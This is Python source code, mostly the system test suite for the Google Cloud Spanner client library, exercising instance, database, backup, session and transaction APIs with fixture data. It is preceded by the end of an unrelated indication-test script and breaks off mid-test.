reactor.stop()
raise
thread = threading.Thread(target=threadfunc)
thread.start()
reactor.run()
print ''
if _num_to_send != _insts_received:
print 'Expected %s indications, got %s' % (_num_to_send, _insts_received)
print 'Indication Tests failed!'
sys.exit(1)
else:
print 'Indication Tests passed.'
|
test_system.py | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1.proto.type_pb2 import ARRAY
from google.cloud.spanner_v1.proto.type_pb2 import BOOL
from google.cloud.spanner_v1.proto.type_pb2 import BYTES
from google.cloud.spanner_v1.proto.type_pb2 import DATE
from google.cloud.spanner_v1.proto.type_pb2 import FLOAT64
from google.cloud.spanner_v1.proto.type_pb2 import INT64
from google.cloud.spanner_v1.proto.type_pb2 import STRING
from google.cloud.spanner_v1.proto.type_pb2 import TIMESTAMP
from google.cloud.spanner_v1.proto.type_pb2 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner import Client
from google.cloud.spanner import KeyRange
from google.cloud.spanner import KeySet
from google.cloud.spanner import BurstyPool
from google.cloud.spanner import COMMIT_TIMESTAMP
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
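# grpc.StatusCode members carry a (numeric_code, name) tuple as their value;
# index by the numeric code so status codes returned by batch_update can be
# mapped back to enum members.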
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
return len(database.ddl_statements) == len(DDL_STATEMENTS)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID, config_name)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance object and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance object and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
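# Fixture timestamps are naive datetimes, while Spanner returns UTC
# DatetimeWithNanoseconds; compare field by field, checking nanoseconds only
# when the expected value actually carries them.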
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [
database.database_id for database in Config.INSTANCE.list_databases()
]
self.assertIn(temp_db_id, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout "
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(DDL_STATEMENTS, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(DDL_STATEMENTS))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name != current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0]
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
for page in instance.list_backups(page_size=1).pages:
count = 0
for backup in page:
count += 1
self.assertEqual(count, 1)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
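# A NaN with a nonstandard bit pattern, to verify NaN cells are treated as
# NaN regardless of payload.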
OTHER_NAN, = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
)
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for column in ALL_TYPES_COLUMNS])
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
def test_batch_insert_then_read_string_array_of_string(self):
TABLE = "string_plus_array_of_string"
COLUMNS = ["id", "name", "tags"]
ROWDATA = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(TABLE, self.ALL)
batch.insert(TABLE, COLUMNS, ROWDATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(TABLE, COLUMNS, self.ALL))
self._check_rows_data(rows, expected=ROWDATA)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, ALL_TYPES_COLUMNS, ALL_TYPES_ROWDATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, ALL_TYPES_COLUMNS, self.ALL))
self._check_rows_data(rows, expected=ALL_TYPES_ROWDATA)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
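# Fixture rows are trusted, so values are interpolated straight into the SQL;
# production code should pass params/param_types instead.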
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
